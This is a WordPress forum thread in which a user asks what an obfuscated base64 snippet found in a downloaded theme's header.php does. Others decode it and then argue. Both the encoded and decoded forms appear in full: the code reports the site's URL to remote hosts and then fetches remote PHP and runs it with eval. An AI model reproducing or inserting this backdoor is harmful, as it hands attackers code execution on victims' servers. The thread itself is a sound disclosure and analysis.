Support » Themes and Templates » Nasty base64 code in header.php – Can you decode

  • Downloaded a theme and found this in header.php. Unfortunately I shortly activated the theme on my server and I am afraid that it did something nasty there

    <?php @eval(@base64_decode('aWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNzci5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3Bzc3IiOyBlbHNlaWYoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNiA9IEBmc29ja29wZW4oInd3dy53cHNuYy5jb20iLCA4MCwgJFIzMkQwMDA3MEQ0RkZCQ0NFMkZDNjY5QkJBODEyRDRDMiwgJFI1RjUyNUY1QjM5OERBREQ3Q0YwNzg0QkQ0MDYyOThFMywgMykpICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMiOyBlbHNlICRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUgPSAid3BzbmMyIjsgQGV2YWwoJyRSMTRBRjFCRTlFRTI2QTkwOTIxRTY0QTgyRTc4MzY3OTcgPSAxOycpOyBpZigkUjE0QUYxQkU5RUUyNkE5MDkyMUU2NEE4MkU3ODM2Nzk3IEFORCBpbmlfZ2V0KCdhbGxvd191cmxfZm9wZW4nKSkgeyAgJFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5NiA9ICIxIjsgICRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUgPSAiaHR0cDovL3d3dy4kUjUwRjVGOUM4MEYxMkZGQUU4QjI0MDA1MjhFODFCMzRFLmNvbS93JFJEM0ZFOUMxMEE4MDhBNTRFQTJBM0RCRDlFNjA1QjY5Ni5waHA/dXJsPSIuIHVybGVuY29kZSgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkgLiImIi4gImhvc3Q9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSk7ICAkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRSNkU0RjE0QjMzNTI0M0JFNjU2QzY1RTNFRDlFMUIxMTUpOyAgQGV2YWwoJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7IH0gZWxzZSB7ICAkUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2ID0gIjAiOyAgJFI2RTRGMTRCMzM1MjQzQkU2NTZDNjVFM0VEOUUxQjExNSA9ICJodHRwOi8vd3d3LiRSNTBGNUY5QzgwRjEyRkZBRThCMjQwMDUyOEU4MUIzNEUuY29tL3ckUkQzRkU5QzEwQTgwOEE1NEVBMkEzREJEOUU2MDVCNjk2LnBocD91cmw9Ii4gdXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSAuIiYiLiAiaG9zdD0iLiB1cmxlbmNvZGUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKTsgIEByZWFkZmlsZSgkUjZFNEYxNEIzMzUyNDNCRTY1NkM2NUUzRUQ5RTFCMTE1KTsgfSBmY2xvc2UoJFIzN0MwMTREQUU1RkU0RkU1Qzc3QjY3MzVBQkMzMDkxNik7')); ?>

Viewing 15 replies - 1 through 15 (of 27 total)
  • Here’s what I got when I used OpinionatedGeek’s decoder at http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx

    if($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpssr.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpssr"; elseif($R37C014DAE5FE4FE5C77B6735ABC30916 = @fsockopen("www.wpsnc.com", 80, $R32D00070D4FFBCCE2FC669BBA812D4C2, $R5F525F5B398DADD7CF0784BD406298E3, 3)) $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc"; else $R50F5F9C80F12FFAE8B2400528E81B34E = "wpsnc2"; @eval('$R14AF1BE9EE26A90921E64A82E7836797 = 1;'); if($R14AF1BE9EE26A90921E64A82E7836797 AND ini_get('allow_url_fopen')) { $RD3FE9C10A808A54EA2A3DBD9E605B696 = "1"; $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); $R3E33E017CD76B9B7E6C7364FB91E2E90 = @file_get_contents($R6E4F14B335243BE656C65E3ED9E1B115); @eval($R3E33E017CD76B9B7E6C7364FB91E2E90); } else { $RD3FE9C10A808A54EA2A3DBD9E605B696 = "0"; $R6E4F14B335243BE656C65E3ED9E1B115 = "http://www.$R50F5F9C80F12FFAE8B2400528E81B34E.com/w$RD3FE9C10A808A54EA2A3DBD9E605B696.php?url=". urlencode($_SERVER['REQUEST_URI']) ."&". "host=". urlencode($_SERVER['HTTP_HOST']); @readfile($R6E4F14B335243BE656C65E3ED9E1B115); } fclose($R37C014DAE5FE4FE5C77B6735ABC30916);

    Thanks a lot. I had the same result with some online decoder and thought it wasn’t fully decoded yet but it probably is?

    Looks like it’s trying it’s own server availability and then sending the URL that the theme is running on and the surfers’s IPS host name to it’s servers, and sending a file to the surfer?

    Can anybody shed some light on what the script is doing?

    whooami

    (@whooami)

    Member

    Not sure how that answers my question whooami. Go troll in another thread

    whooami

    (@whooami)

    Member

    it only answers your question if you actually read whats on those links.

    how about you go take your pissy attitude back to your hole. did you really need someone to regurgitate whats available elsewhere?

    Nice that you noticed the code, props for that, but dont take your bitchiness about it out on me. I didnt put it there.

    Not sure how that answers my question whooami. Go troll in another thread

    and

    Can anybody shed some light on what the script is doing?

    You clearly don’t know who you’re dealing with. Whoo is a security expert, you nimrod. Can’t be bothered to click on a link that might not only shed light on your problem but also help PREVENT you from making the mistake that brought you here in the first place?

    Un-freaking-believable.

    Well whooami you where snippy from the get go. I apologize for not actually reading the content of the links and for calling your post trolling but you shouldn’t need to get all shooked up now. I got to wpsphere through an Adsense ad on google.com an hour ago. I had to assume that their scam is fairly new or the ad wouldn’t be running on #1 in adsense. I actually acted fairly knowledgable and figured it out quick, and reported them to adsense, too. And the links you mentioned do indeed NOT explain more than I already figured out myself, the second link mentions that it could be “very, very, very dangerous”.

    Great, yet another name caller arrived.

    The links didn’t contain anything that I had not figured out myself. And obviously I was the first one to actually report them. So calm down jonimueller or whoever is going to chime in next.

    whooami

    (@whooami)

    Member

    im by no means an expert, but gee thanks 😛

    You’re pretty knowledgeable, certainly more so than me! (Which of course isn’t saying much.)

    Curious – I just read over the GPL to find out, and I think I know the answer, but just to make sure – you can, when releasing a theme, specify that it not be modified unless

    “a) The work must carry prominent notices stating that you modified it, and giving a relevant date.”

    Can you specify that the theme not be distributed, and downloaded only from a specific place?

    You can try, Rose. There was an outfit here a while back, I think Matt’s lawyers finally shut him down b/c he had “WordPress” in his domain name, but he was selling some prepackaged WordPress with over 100 free themes (5 of them were ours) for $197 a pop. That was pretty galling if you ask me. So you can ASK, but the Internet isn’t polite society, so I wouldn’t count on that stopping anyone.

    @bytes .. Well you asked “Can anybody shed some light on it?” and immediately after, you got your answer in the form of some (helpful) links. So if you already knew the answer, why the question? Oh, and sorry, but I will decide when and whether I will sit down and shut up. But thanks for trying. My husband’s been at it for over 30 years and he hasn’t had any more luck than you. 😉

    Actually, I should have been more clear. Can you specify that the theme not be distributed, and still release it under GPL? Forgive my ignorance – I can’t figure out the answer to that from the license itself.

    when i download a theme that has that i see if they offer a live preview. if they do then view the source of the page and grab the code you need from there and use it instead of that other code.

    Example: if the scrambled code is in the footer than go to the live preview and view source, then scroll down till you get to the footer and take the code from the view source and replace the scrambled code with it.

    P.S whooami is a butt hole to every just ignore him.

    @erichamby whooami is a she if I am not wrong =D

Viewing 15 replies - 1 through 15 (of 27 total)
  • The topic ‘Nasty base64 code in header.php – Can you decode’ is closed to new replies.